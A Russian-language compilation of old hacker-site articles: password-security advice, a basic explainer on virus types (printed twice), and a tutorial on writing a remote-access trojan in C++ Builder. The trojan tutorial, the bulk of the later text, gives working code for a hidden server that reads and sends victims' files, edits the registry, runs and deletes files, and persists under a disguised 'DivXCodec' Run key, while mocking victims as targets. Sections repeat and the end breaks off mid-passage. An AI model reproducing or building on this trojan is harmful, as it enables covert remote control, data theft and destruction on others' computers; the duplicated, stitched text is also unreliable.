Проанализировав довольно большое количество паролей, я хотел бы дать несколько советов, которые, как мне кажутся, помогут вам избежать утечки информации. Многие из них банальны, но как показала практика не соблюдаются в большинстве случаев, поэтому напомнить их будет не лишним.
Советы пользователям. Самый важный совет - никогда не используйте одинаковые пароли для доступа к разным системам! Даже если он кажется абсолютно устойчивым и надежным, например V1!2cEqP,@#19r. Взломщик может получить ваш пароль для доступа к одной системе, используя какую-либо уязвимость в ней. И это будет не ваша вина, а вина программистов. Но если он, получив один пароль, сможет получить контроль над всей вашей деятельностью в сети - это будет целиком на вашей совести.
Теперь поговорим о выборе пароля. Никогда не используйте пароли, состоящие только из цифр. Количество возможных комбинаций из цифр невелико (при желании - рассчитайте его по формуле) и такой пароль может быть подобран относительно быстро даже при удаленной атаке. Проверьте пароль, используемый вами - если в свободной таблице он попадает в оранжевые ячейки, то можно утверждать, что он не надежен. Ваша цель при создании пароля - достичь максимально разумного числа символов в исходном наборе (используйте разный регистр и специальные символы). Не используйте осмысленные пароли и их модификации. Взломщику не составит большого труда подобрать его. Не думайте, что система блокирования IP-адреса после определенного числа попыток войти в систему с неверным паролем защитит вас - посмотрите список прокси-серверов на httpsamair.ruproxy и убедитесь, что это лишь ширма, а не защита.
Если ваш пароль ненадежен - смените его сейчас, не ждите, пока кто-нибудь получит доступ к вашей конфиденциальной информации. Вполне возможно, что уже сейчас почта с вашего почтового ящика перенаправляется конкурентам, а вы даже не подозреваете об этом. Очень рекомендуется менять пароли для доступа к важным для вас сервисам хотя бы раз в месяц.
Еще один важный аспект защиты - системы восстановления забытых паролей. Многие выбирают вполне достойные пароли, которые не по зубам взломщикам, но оказываются уязвимыми через эти системы.
Во-первых, никогда не указывайте несуществующий ящик в качестве альтернативного почтового адреса, на который будет высылаться пароль, - взломщик может воспользоваться этим. Зарегистрировав этот аккаунт на себя, получение вашего пароля будет делом нескольких минут. Во-вторых, очень важным является контрольный вопрос, который позволяет восстановить забытый пароль. Никогда не указывайте в ответе на него свои личные данные (год рождения, кличку собаки, девичью фамилию матери) - взломщик может с легкостью получить эту информацию, используя либо поиск в интернете, либо социальную инженерию. Во втором случае вы или ваши близкие (сослуживцы, родственники) сами с удовольствием раскроете взломщику эту информацию. Идеальным вариантом будет указать в ответе на контрольный вопрос случайный набор символов.
Еще несколько банальных советов. Регулярно обновляйте антивирусный софт, установите на ваш компьютер файрвол. Используйте альтернативный браузер (Opera) и почтовый клиент (The Bat!). Львиная доля уязвимостей в ПО, используемых взломщиками, приходится на продукты компании Microsoft.
Советы администратору. Введите систему контроля над паролями, которые выбирают пользователи. Лучше всего требовать наличия в нем букв и цифр, причем цифр не в начале или конце пароля, а в середине (хотя это и не убережет от паролей типа pass123pass, но множество глупых паролей будет отсеяно). Ограничивайте минимальную длину пароля хотя бы шестью символами. Не ограничивайте максимальную длину пароля (на мой взгляд, все разумные причины для этого не актуальны на текущей стадии развития аппаратного обеспечения).
Продумайте систему восстановления забытых паролей. Я считаю, что восстановление путем ответа на контрольный вопрос - недостаточно надежная схема. Множество паролей взламывается именно через контрольный вопрос. Если вы не хотите потом разбираться, кому на самом деле принадлежит учетная запись, не используйте такую систему. На мой взгляд, хороший метод восстановления пароля - это высылка на указанный при регистрации почтовый ящик. Желательно высылать не старый пароль, а заново сгенерированный. Это поможет избежать шпионажа или действий от лица другого человека, а также взлома аккаунтов пользователя на других системах.
В большинстве сетевых приложений сейчас используется аутентификация на базе алгоритма md5, который, хоть и надежен, довольно неустойчив при использовании слабых паролей. Существует разные системы для защиты хэшей, хранящихся в базе данных, от взлома методом грубой силы. Например я встречал такой совет храните не весь хэш, а лишь его первые 16 символов, что затруднит атакующему ввод таких огрызков в программу для взлома, а вероятность совпадения первых 16 байт для разных паролей довольно мала. Более того, я встречал такой метод реализованным на практике. Это не самый лучший выход, так как допускает коллизионность паролей, а реальных препятствий взломщику не создает никаких.
Вирусы
В далеком 1988 году в компьютерном мире появилось такое понятие, как 'вирус'. Сегодня этот термин совсем не утратил своей значимости. Это можно с легкостью определить по количеству антивирусных кампаний, разбросанных по всему миру и имеющих гигантские доходы. Сегодня мы поговорим только об основах - что такое вирус, какие бывают разновидности и как можно подцепить эту "заразу".
Терминология
Ох, какие определения компьютерного вируса я только не слышал. Некоторые из них были совсем бредовые, другие были неполные, а третьи были на других языках ;). Я все же возьму на себя смелость и попробую дать свое, независимое определение. Итак, компьютерный вирус в моем понимание - это самовыполняющийся код, при запуске которого, вирус пытается скопировать свое 'тело' в другой самовыполняющийся код (программу). Главная цель разработчика вируса - успеть заразить как можно больше компьютеров, до того, как его творение смогут находить и уничтожать антивирусные программы.
Каждый автор вируса преследует какую-нибудь конечную цель. Одни хотят почистить твой винт, путем удаления всей информации без возможности дальнейшего восстан овления, другие - просто делают так, чтобы ваша версия Windows показывала только 'синий экран смерти', третьи - пишут вирусы, которые просто копируют себя, не нанося никакого ущерба системе. Не все вирусы опасны!
Классификация вирусов
Со времен Роберта Морриса, появилось несколько десятков тысяч вирусов (Интересно, предполагал ли сам Моррис, что у него будет столько последователей). Безусловно, чтобы как-то облегчить восприятие информации, вирусы решили поделить на несколько больших категорий. Всего их шесть и каждую из них мы сейчас рассмотрим. Бывает и такое, что вирус нельзя поместить ни в один из следующих разделов, но такое очень редко встречается.
Вирусы загрузочного сектора: перемещают себя в загрузочный сектор диска - это такая область диска, которая загружается сразу же после включения компьютера. Последствия: Скорее всего вы просто не сможете загрузить свой компьютер.
Файловые вирусы: заражают программы. После того, как эти приложения будут запущены на другом компьютере, вирус заразит и его. Последствия: все зависит от автора вируса.
Макро вирусы: пишутся, используя упрощенный макро язык программирования. Эти вирусы заражают приложения Microsoft Office, такие как Word и Excell и насчитывают около 75 процентов всех вирусов, найденных в интернете. Документ, инфицированный этим типом вирусов, обычно заменяет собой команду, которая часто используется (например, 'Save'). Вместе с этой программой запускается и вирус - все это происходит незаметно.
Мульти (Multipartite) вирусы: заражают как программы, так и загрузочный (boot) сектор. Эти вирусы вдвойне опасны, т. к. они заражают компьютер десятки раз, до того, как будут найдены антивирусами.
Полиморфные вирусы: модифицируют свой код каждый раз, когда попадают на новый компьютер. Теоретически, антивирусам очень сложно обнаружить эти вирусы, хотя, как показывает практика, вирусы не достаточно хорошо написаны.
Стэлс (Stealth) вирусы: скрывают свое присутствие, показывая, что зараженные файлы являются не зараженными. Антивирусы хорошо распознают эти вирусы.
Как я могу заразиться вирусом?
Загружаясь с зараженной дискеты
Каждый раз, когда зараженная дискета используется для загрузки компьютера, вирус проникает в систему. Это может произойти, даже если дискета не содержит файлов, которые необходимы для загрузки компьютера. На персональных компьютерах, заражение происходит, когда кто-либо загрузит или перезагрузит компьютер с дискетой, вставленной в дисковод. Нужно выработать в себе привычку - всегда проверять и вытаскивать дискету перед загрузкой компьютера.
Запуская зараженную программу
Как только программа, зараженная вирусом, была вами запущена, то ваш компьютер тоже стал инфицированным. Поэтому вы должны регулярно сканировать программы, скаченные из интернета или полученные через BBS на вирусы. Были примеры, когда даже коммерческие программы были заражены вирусами!
Лучший способ уберечь себя от вирусов - не открывать файлы, приложенные к письмам, которые вы не ждали или скаченные с подозрительных интернет-ресурсов. Если вы все-таки получили письмо с аттачем внутри, то, НЕ ОТКРЫВАЯ ЕГО, напишите автору этого письма. Расспросите, что находится в архиве и действительно ли он хотел посылать это письмо.
Для надежной защиты вы должны приобрести хороший антивирус и стараться ежедневно обновлять антивирусные базы.
Кроме того, многие персональные файерволы сейчас поставляются с антивирусным пакетом.
Многие исследования показали, что от 30 процентов всех фирм малого бизнеса подвержены вирусным атакам. В большинстве случаев антивирусы либо неправильно установлены, либо антивирусные базы не обновляются.
Как работают антивирусы?
Поиск вирусов идет двумя путями. Если это вирус уже известный (тот, который когда-то уже был найден и для него написано противоядие), то программа ищет 'подпись' вируса - уникальная последовательность байт, которая определяет вирус, как отпечатки пальцев у людей. Далее антивирус просто сотрет вредоносную программу. Хорошие антивирусы могут по одной 'подписи' определять разнообразные варианты одного и того же вируса.
В случае нахождения нового вируса, для которого нет противоядия, антивирус запустит дополнительную подпрограмму (ее может и не быть - все зависит от антивирусной компании), которая расскажет, к каким последствиям может привести запуск данной программы (например, модификация системного реестра). Если вы думаете, что программа может оказаться вирусом, то ее следует отослать разработчикам антивируса. Они в свою очередь напишут противоядие и поместят в каталог с известными вирусами.
А-у-у-тро
В наше время, вирусов не боятся только идиоты и те, у которых нет компьютера. В связи с тем, что вирус может написать абсолютно любой человек, хорошо знакомый с языком Assembler, нам следует больше обращать внимание на такие мелочи, как забытая дискета в дисководе. Кто может гарантировать, что ваш сосед не написал второй 'Чернобыль'? Обновите антивирусные базы!
Терминология
Ох, какие определения компьютерного вируса я только не слышал. Некоторые из них были совсем бредовые, другие были неполные, а третьи были на других языках ;). Я все же возьму на себя смелость и попробую дать свое, независимое определение. Итак, компьютерный вирус в моем понимание - это самовыполняющийся код, при запуске которого, вирус пытается скопировать свое 'тело' в другой самовыполняющийся код (программу). Главная цель разработчика вируса - успеть заразить как можно больше компьютеров, до того, как его творение смогут находить и уничтожать антивирусные программы.
Каждый автор вируса преследует какую-нибудь конечную цель. Одни хотят почистить твой винт, путем удаления всей информации без возможности дальнейшего восстан овления, другие - просто делают так, чтобы ваша версия Windows показывала только 'синий экран смерти', третьи - пишут вирусы, которые просто копируют себя, не нанося никакого ущерба системе. Не все вирусы опасны!
Классификация вирусов
Со времен Роберта Морриса, появилось несколько десятков тысяч вирусов (Интересно, предполагал ли сам Моррис, что у него будет столько последователей). Безусловно, чтобы как-то облегчить восприятие информации, вирусы решили поделить на несколько больших категорий. Всего их шесть и каждую из них мы сейчас рассмотрим. Бывает и такое, что вирус нельзя поместить ни в один из следующих разделов, но такое очень редко встречается.
Вирусы загрузочного сектора: перемещают себя в загрузочный сектор диска - это такая область диска, которая загружается сразу же после включения компьютера. Последствия: Скорее всего вы просто не сможете загрузить свой компьютер.
Файловые вирусы: заражают программы. После того, как эти приложения будут запущены на другом компьютере, вирус заразит и его. Последствия: все зависит от автора вируса.
Макро вирусы: пишутся, используя упрощенный макро язык программирования. Эти вирусы заражают приложения Microsoft Office, такие как Word и Excell и насчитывают около 75 процентов всех вирусов, найденных в интернете. Документ, инфицированный этим типом вирусов, обычно заменяет собой команду, которая часто используется (например, 'Save'). Вместе с этой программой запускается и вирус - все это происходит незаметно.
Мульти (Multipartite) вирусы: заражают как программы, так и загрузочный (boot) сектор. Эти вирусы вдвойне опасны, т. к. они заражают компьютер десятки раз, до того, как будут найдены антивирусами.
Полиморфные вирусы: модифицируют свой код каждый раз, когда попадают на новый компьютер. Теоретически, антивирусам очень сложно обнаружить эти вирусы, хотя, как показывает практика, вирусы не достаточно хорошо написаны.
Стэлс (Stealth) вирусы: скрывают свое присутствие, показывая, что зараженные файлы являются не зараженными. Антивирусы хорошо распознают эти вирусы.
Как я могу заразиться вирусом?
Загружаясь с зараженной дискеты
Каждый раз, когда зараженная дискета используется для загрузки компьютера, вирус проникает в систему. Это может произойти, даже если дискета не содержит файлов, которые необходимы для загрузки компьютера. На персональных компьютерах, заражение происходит, когда кто-либо загрузит или перезагрузит компьютер с дискетой, вставленной в дисковод. Нужно выработать в себе привычку - всегда проверять и вытаскивать дискету перед загрузкой компьютера.
Запуская зараженную программу
Как только программа, зараженная вирусом, была вами запущена, то ваш компьютер тоже стал инфицированным. Поэтому вы должны регулярно сканировать программы, скаченные из интернета или полученные через BBS на вирусы. Были примеры, когда даже коммерческие программы были заражены вирусами!
Лучший способ уберечь себя от вирусов - не открывать файлы, приложенные к письмам, которые вы не ждали или скаченные с подозрительных интернет-ресурсов. Если вы все-таки получили письмо с аттачем внутри, то, НЕ ОТКРЫВАЯ ЕГО, напишите автору этого письма. Расспросите, что находится в архиве и действительно ли он хотел посылать это письмо.
Для надежной защиты вы должны приобрести хороший антивирус и стараться ежедневно обновлять антивирусные базы.
Кроме того, многие персональные файерволы сейчас поставляются с антивирусным пакетом.
Многие исследования показали, что от 30 процентов всех фирм малого бизнеса подвержены вирусным атакам. В большинстве случаев антивирусы либо неправильно установлены, либо антивирусные базы не обновляются.
Как работают антивирусы?
Поиск вирусов идет двумя путями. Если это вирус уже известный (тот, который когда-то уже был найден и для него написано противоядие), то программа ищет 'подпись' вируса - уникальная последовательность байт, которая определяет вирус, как отпечатки пальцев у людей. Далее антивирус просто сотрет вредоносную программу. Хорошие антивирусы могут по одной 'подписи' определять разнообразные варианты одного и того же вируса.
В случае нахождения нового вируса, для которого нет противоядия, антивирус запустит дополнительную подпрограмму (ее может и не быть - все зависит от антивирусной компании), которая расскажет, к каким последствиям может привести запуск данной программы (например, модификация системного реестра). Если вы думаете, что программа может оказаться вирусом, то ее следует отослать разработчикам антивируса. Они в свою очередь напишут противоядие и поместят в каталог с известными вирусами.
А-у-у-тро
В наше время, вирусов не боятся только идиоты и те, у которых нет компьютера. В связи с тем, что вирус может написать абсолютно любой человек, хорошо знакомый с языком Assembler, нам следует больше обращать внимание на такие мелочи, как забытая дискета в дисководе. Кто может гарантировать, что ваш сосед не написал второй 'Чернобыль'? Обновите антивирусные базы!
Троянчик))
Сегодня мы будем учиться писать троянчик. Небольшой, но СВОЙ! Почему? Конечно-конечно, троянов в сети навалом, но рано или поздно они =вдруг= начинают определяться антивирусами, приходиться ждать апдейта етц... Ожидание - самый скучный повод. Не знаю как вы, но я ждать не люблю, да и использовать чужие трояны это совсем не по-}{аЦкERR'ски. Короче, пишем свой троян и точка.
После точки, как учили в школе, пишем с большой буквы... Так вот, о чем я? Писать я буду, как обычно, на своем любимом Builder C++. Если у вас руки растут не оттуда, откуда у меня ноги, то без проблем все переделаете под Дельфи, если припрет конечно...
Естественно, наш троян будет состоять из 2х частей =) Серверной (отправляемой как подарок ламерюге) и клиентской (оставим себе на память). Надо сказать, что я давно не юзал никакие трояны, так что не знаю что там сейчас они умеют делать, может уже и коврик под мышкой научились двигать или корпус компа открывать. Мы же пишем "троянчик", поэтому делать он будет только следующее:
1) читать, удалять, запускать файлы на удаленном компьютере
2) работать с реестром на удаленном компьютере
3) ну и традиционный набор разных бесполезных функций, типа открытие CD-ROM'a, смена клавишей мышки etc.
Перекурили и поехали!
Использовать будем стандартные компоненты TClientSocket и TServerSocket.
Начнем с клиента. Набрасываем простенький интерфейс и приступаем к реализации. Управлять удаленным компьютером будем с помощью специальных команд. Для примера пускай структура их будет такая:
Nпараметры. N - цифра. Каждому действию присвоен свой код. Т.е. например 1 - перезагрузка, 2 - чтение файла и т.д. Главное чтоб было однозначное соответствие между тем что хотим сделать (команда передаваемая клиентом) и тем что выполняет программа (обработка команды на сервере). С этим разобрались. Теперь параметры. Бывает мало передать только номер команды. Конечно, чтобы перезагрузить компьютер никаких параметров не надо (хотя можно и здесь передать параметры в функцию перезагрузки), но как например реализовать удаление файла не передавая параметра? Мы передаем команду на удаление файла, но какого?! Для этого будем использовать параметры. В качестве параметра в данном случае будет передаваться имя файла. Бывает, что мало передать один параметр. Например надо прочитать n-строчек из file.txt. Здесь необходимо передать 2 параметра. В нашем примере параметры отделяются друг от друга комбинацией "\r\n" - перевод каретки. Объясняется данная структура тем, что в сервере мы сначала помещаем полученную команду в TStringList и потом можем спокойно обращаться к любой строчке этого TStringList'а через свойство Strings, где i-номер строчки, а соответственно и номер параметра. В общем, это вещи достаточно очевидные.
Вот так, вроде бы только начав писать клиентскую часть мы ее уже почти и закончили! Ведь на самом деле ничего кроме отсылки команд и приема ответов от сервера она делать и не должна. Для приема ответов просто создадим поле TMemo и добавим обработчик события OnRead нашего компонента TClientSocket:
C++
void __fastcall TForm1::TrojControllerRead(TObject *Sender,
TCustomWinSocket *Socket)
{
Memo2->Lines->Add(Socket->ReceiveText());
}
Вот и все. Клиент законен! Переходим к серверу...
Сервер будет чуть пообъемнее. Вначале определимся с задачами:
1) получение команд
2) их обработка и выполнение соответствующих действий
3) отсылка ответа клиенту (должны же мы знать что происходит на сервере)
Реализуем...
Во-первых, никакого визуального оформления естественно не будет =) Поэтому на форму поместим только 1 компонент: TServerSocket. Инициализацию его проведем в функции FormCreate(). Хотя можно было бы просто прописать 2 параметра в Object Inspector'е. Но раз уж сделали, так сделали =)
C++
void __fastcall TForm1::FormCreate(TObject *Sender)
{
// ServSckt - наш компонент TServerSocket
ServSckt->Port = 4321;
ServSckt->Active = true;
}
Итак, указали порт, активизировали сокет. Теперь обрабатываем событие ClientRead, т.е. получение данных сокетом. Комментирую на примере:
C++
void __fastcall TForm1::ServScktClientRead(TObject *Sender,
TCustomWinSocket *Socket)
{
RecCommand(Socket->ReceiveText()); // пишем для наглядности функцию обработки поступившей
// информации, которую передаем как параметр этой функции
}
//---------------------------------------------------------------------------
// собственно сама функция: Rec - сокращение от Recognize. Можно по-другому назвать =)
void TForm1::RecCommand (String received)
{
int cn;
TTrojanUtilites Utilz; // создаем объект наших утилит
Utilz.Sock=ServSckt; // необходимо для отсылки ответа клиенту, так как сокет у нас
// находится на форме, а TTrojanUtilites не имеет никакого отношения
// к форме. Просто передаем указатель на TServerSocket
String temp;
temp=received;
temp.Delete(2,temp.Length()); // получаем первый символ сообщения - номер команды
cn = StrToInt(temp); // преобразуем в число
received.Delete(1,1); // удаляем код команды - остаются одни параметры
switch (cn) { // в соответсвии с полученой командой
// запускаем соотвествующую утилиту
case 1 : Utilz.RestartMachine(); break; // перезагрузка
case 2 : Utilz.WriteRegistry(received); break; // запись в реестр
case 3 : Utilz.ReadRegistry(received); break; // чтение реестра
case 4 : Utilz.SendFile(received); break; // чтение файла
case 5 : Utilz.DeleteFile(received); break; // удаление файла
case 6 : Utilz.ExecuteFile(received); break; // запуск файла
case 7 : Utilz.OpenCloseCD; break; // открытие/закрытие CD-ROM
case 8 : Utilz.HideMouse(); break; // прячем курсор мыши
case 9 : Utilz.SwapMouseButtons(); break; // переключаем кнопки мыши
default:
SendMsgToClient("Неправильная команда!") ; // получена недопустимая команда
// информируем клиента об этом
}
}
Теперь немного подробнее. Мы пишем специальный класс TTrojanUtilites, в котором реализуем все необходимые функции. В RecognizeCommand (String Directive) мы только отделяем команду от параметров и запускаем необходимые методы TTrojanUtilites, передавая по необходимости в них параметры.
Реализация TTrojanUtilites есть то, чем мы сейчас займемся. Класс оформим в отдельном модуле, не забудьте подключить его.
Поехали... Во-первых, подключаем #include - необходимо для реализации работы с CD-ROM'ом. Далее пишем все необходимые методы.
Краткие комментарии на примере:
C++
void TTrojanUtilites::OpenCloseCD()
{
TMCI_Open_Parms OpenParm;
TMCI_Generic_Parms GenParm;
TMCI_Set_Parms SetParm;
Cardinal DI;
OpenParm.dwCallback = 0;
OpenParm.lpstrDeviceType = "CDAudio";
mciSendCommand(0, MCI_OPEN, MCI_OPEN_TYPE, Longint(&OpenParm));
DI = OpenParm.wDeviceID;
if (!CDROMOPEN)
{
mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_OPEN, Longint(&SetParm));
CDROMOPEN = true; // открыть
}
else
{
mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_CLOSED, Longint(&SetParm));
CDROMOPEN = false; // закрыть
}
mciSendCommand(DI, MCI_CLOSE, MCI_NOTIFY, Longint(&GenParm));
Sock->Socket->Connections[0]->SendText("Выполнено открытие/закрытие CD-ROM");
}
Перезагрузка:
C++
void TTrojanUtilites::RestartMachine()
{
if (ExitWindowsEx(EWX_FORCE,0) || ExitWindowsEx(EWX_REBOOT,0));
Sock->Socket->Connections[0]->SendText("Перезагрузка успешно выполнена.");
}
Вот тут я не отвечаю за все ОСи, перезагрузка-то будет, но хотелось бы сделать ее как после нажатия кнопки RESET, а так будет послано сообщение WM_...ENDSESSION etc. Короче, пробуйте сами. Могу только подкинуть основные направления поиска: смотри функции ExitWindows(), ExitWindowsEx(), InitiateSystemShutdown() и AbortSystemShutdown(). Для особо продвинутых могу предложить вариант написать надежный ребут под определенную ось и чипсет =) Например, мой прошлый комп стабильно резетился (только в Win9x, в NT не работало) следующей вставочкой:
mov dx,0cf9h
mov al,2
out dx,al
mov al,6
out dx,al
Откуда цифры? Читайте доки по чипсету =) Одним словом, универсального метода перезагрузить комп без WM_...ENDSESSION я не знаю. Если вы знаете - напишите пару строк, не в падлу =)
C++
void TTrojanUtilites::SendFile(String F)
{
TStringList* TTSL=new (TStringList);
TStringList* TTSL2=new (TStringList);
int n, i;
TTSL->Text = F;
if (!FileExists(TTSL->Strings[0]))
{
Sock->Socket->Connections[0]->SendText("Файл не существует.");
return;
}
TTSL2->LoadFromFile(TTSL->Strings[0]); // загружаем файл в TStringList
n = TTSL2->Count; // получаем число строк в файле
if (n > StrToInt(TTSL->Strings[1])) // если надо прочитать не весь файл
n = StrToInt(TTSL->Strings[1]); // считываем только необходимое число строк
for (i=0;iSocket->Connections[0]->SendText(TTSL2->Strings[i]); // передаем строки клиенту
}
Вроде тут и объяснять нечего.
C++
void TTrojanUtilites::ReadRegistry(ShortString k)
{
TRegistry* reg=new TRegistry;
String res, ts;
TStringList* TTSL=new TStringList;
HKEY k1;
// параметры передаются в следующем порядке:
//// 0 - root key
//// 1 - key name
//// 2 - value name
//// 3 - value
//// 4 - type of value
TTSL->Text = k;
ts = TTSL->Strings[0]; // выбираем RootKey
if (ts == "HKEY_CLASSES_ROOT") k1 = HKEY_CLASSES_ROOT;
if (ts == "HKEY_CURRENT_USER") k1 = HKEY_CURRENT_USER;
if (ts == "HKEY_LOCAL_MACHINE") k1 = HKEY_LOCAL_MACHINE;
if (ts == "HKEY_USERS") k1 = HKEY_USERS;
if (ts == "HKEY_CURRENT_CONFIG") k1 = HKEY_CURRENT_CONFIG;
reg->RootKey = k1;
reg->OpenKey(TTSL->Strings[1], true); // открываем раздел
ts = TTSL->Strings[3]; // читаем значение параметра опредеоенного типа
if (ts == "Bool") // двоичный (REG_BINARY)
if (reg->ReadBool(TTSL->Strings[2]))
res = "true";
else res = "false";
if (ts == "Integer") // числовой (REG_DWORD)
res = IntToStr(reg->ReadInteger(TTSL->Strings[2]));
if (ts == "String") // строковый (REG_SZ)
res = reg->ReadString(TTSL->Strings[2]);
Sock->Socket->Connections[0]->SendText("Чтение реестра. Значение параметра: "+res);
// передаем клиенту значение параметра
}
Запись в реестр аналогична, только используется метод WriteBool(TTSL->Strings[2], false); для записи булевского значения, WriteInteger(TTSL->Strings[2], StrToInt(TTSL->Strings[4])); - для числового, WriteString(TTSL->Strings[2], TTSL->Strings[4]); - для строкового.
Для запуска файлов на удаленном компьютере используем следующую функцию:
C++
void TTrojanUtilites::ExecuteFile(String f)
{
ShellExecute(GetDesktopWindow, "open", f.c_str(), "", "", SW_SHOWNORMAL);
Sock->Socket->Connections[0]->SendText("Запущен файл "+f);
}
Файл запускается в той программе, с которой ассоциирован запуск данного типа файлов, т.е. вы можете запускать не толкьо exe, com, bat, но и любые другие файлы. Html-файл откроется в Explorer'e, Opere, Netscape или еще в чем-то... Хрен знает чем там ламерюга пользуется... Можете запустить ему мп3-шку Децла послушать или Бритни какой-нить, пусть проблюется =)
Идем дальше. Парочка бесполезных функций:
C++
void TTrojanUtilites::HideMouse()
{
ShowCursor(false);
Sock->Socket->Connections[0]->SendText("Курсор мыши скрыт");
}
No commentz...
C++
void TTrojanUtilites::SwapMouseButtons()
{
SwapMouseButton(true);
Sock->Socket->Connections[0]->SendText("Кнопки мыши переключены");
Можно сделать переключение кнопок обратно (передайте в SwapMouseButton параметр false), но я бы посоветовал поставить таймер и каждую секунду переключать кнопки туда-сюда, веселее будет =) В падлу сейчас уже добавлять, но вкратце это будет так: добавляем TTimer на форму, устанавливаем необходимый интервал, и в обработчике события OnTimer прописываем вызов функции SwapMouseButton с параметром, противоположным прошлому вызову. Млин, все-таки все расписал =)
Теперь довольно важная функция:
C++
void TTrojanUtilites::DeleteFile(String f)
{
if (!FileExists(f))
{
Sock->Socket->Connections[0]->SendText("Файл не существует.");
return;
}
TRegistry* Reg=new TRegistry;
Reg->RootKey = HKEY_LOCAL_MACHINE;
Reg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true);
Reg->WriteString("Filez for delete","command.com /c del "+f);
Reg->CloseKey();
Sock->Socket->Connections[0]->SendText("Файл "+f+" будет удален после перезагрузки.");
}
Данная функция НЕ удаляет файл сразу!!! Это сделано специально, так как файлы могут использоваться системой и их удаление возможно только после перезагрузки, данная функция помечает файл к удалению, а удалиться он только после перезагрузки, которую вы легко можете вызвать. Да, еще маленькое примечание: данная функция удаляет только 1 файл, если вы пометите второй файл к удалению - то будет удален только он. А первый останется нетронутым... Немного измените функцию - и можно будет удалять файлы пачками =) Могу еще добавить немного инфы на случай, если надо будет удалить целый каталог и вы точно знаете что в нем нет открытых файлов. Используйте стандартную API функцию SHFileOperation, установив тип операции wFunc в FO_DELETE. Пример:
C++
int res;
SHFILEOPSTRUCT fo;
ZeroMemory(&fo, sizeof(fo));
fo.hwnd = hwndOwner; // хэндл окна-владельца прогресс-диалога
fo.pFrom = pszFullPath; //путь
fo.wFunc = FO_DELETE;
fo.fFlags = FOF_NOCONFIRMATION; //не спрашивать подтверждения на удаление
res = SHFileOperation(&fo);
Только внимательно все проверьте! Будет обломно если ламерюга "вдруг" увидит надпись "Папка голые тетки не может быть удалена, так как юзер активно смотрит сразу 10 порно-фильмов из нее!". А вообще, если опять удалиться в теорию, то наш главный объект Application имеет несколько полезных событий, наиболее интересное для нас OnException происходит тогда, когда в приложении возникает необработанная исключительная ситуация (деление на ноль, удаление несуществующего файла etc). По умолчанию, обработчик этого события вызывает метод ShowException для отображения окна сообщения с пояснением причины ошибки (оно нам надо?! конечно, НЕТ!). Но, вы можете изменить реакцию на событие onException, переписав его обработчик. Тут ничего трудного нет, просто я не ставил перед собой задачу написать офигенный троян, только подтолкнуть вас к этому =) Кто захочет - допишет все необходимое сам, если что - я подскажу =) Ну вот, вроде бы все функции реализовали. Теперь немного о том, что мы не сделали =) Мы не сделали: загрузку/закачку файла. Это все можно сделать подправив SendFile(). Стандартных функций для пересылки файлов через TClient(Server)Socket я не нашел, но впрочем, это не проблема - просто передавайте файлы фрагментами.
Теперь нам осталось только разобраться с автозагрузкой трояна. Сделаем следующее:
1) при запуске файл переписывается в папку, в которой установлены винды.
2) прописываем запуск нашего файла в реестре.
Реализуем =)
C++
void __fastcall TForm1::FormCreate(TObject *Sender)
{
ServSckt->Port = 4321;
ServSckt->Active = true;
Utilz.Sock=ServSckt;
Utilz.CDROMOPEN=false;
String WinDir;
char WinDir1[144];
GetWindowsDirectory(WinDir1,144);
WinDir=WinDir1; // папка с установленными виндами
String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
data=pReg->ReadString("DivXCodec");
if (data != Application->ExeName) //если нашу программу стерли из
// автозагрузки (DivXCodec - можете поменять по желанию на любое другое название раздела)
pReg->WriteString("DivXCodec",WinDir+"\\task16man.exe"); //добавляем ее по новой
if (Application->ExeName!=WinDir+"\\task16man.exe") //если файл запустили 1ый раз
{
if (!FileExists(WinDir+"\\task16man.exe"))
{
String dest=WinDir+"\\task16man.exe";
BOOL res=MoveFile(Application->ExeName.c_str(), dest.c_str());
// переписываем файл к виндам
ServSckt->Active = false;
ShellExecute(NULL,NULL,dest.c_str(),NULL,NULL,NULL); //запускаем его
Application->Terminate(); // это приложение закрываем
}
else
Application->Terminate();
// я тут не разбирал вариантов типа прога записалась в винды, но ее еще раз
// запустили и им подобных, додумайте сами =)
}
else
{
ServSckt->Port = 4321;
ServSckt->Active = true;
String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
data=pReg->ReadString("DivXCodec");
if (data != Application->ExeName) // не дай бог стерли!
pReg->WriteString("DivXCodec",Application->ExeName); // пишем назад
}
}
В принципе, это все. Троян готов! Конечно, он тяжеловат, малофункционален etc, НО все это можно исправить, творите =). Удачи!
После точки, как учили в школе, пишем с большой буквы... Так вот, о чем я? Писать я буду, как обычно, на своем любимом Builder C++. Если у вас руки растут не оттуда, откуда у меня ноги, то без проблем все переделаете под Дельфи, если припрет конечно...
Естественно, наш троян будет состоять из 2х частей =) Серверной (отправляемой как подарок ламерюге) и клиентской (оставим себе на память). Надо сказать, что я давно не юзал никакие трояны, так что не знаю что там сейчас они умеют делать, может уже и коврик под мышкой научились двигать или корпус компа открывать. Мы же пишем "троянчик", поэтому делать он будет только следующее:
1) читать, удалять, запускать файлы на удаленном компьютере
2) работать с реестром на удаленном компьютере
3) ну и традиционный набор разных бесполезных функций, типа открытие CD-ROM'a, смена клавишей мышки etc.
Перекурили и поехали!
Использовать будем стандартные компоненты TClientSocket и TServerSocket.
Начнем с клиента. Набрасываем простенький интерфейс и приступаем к реализации. Управлять удаленным компьютером будем с помощью специальных команд. Для примера пускай структура их будет такая:
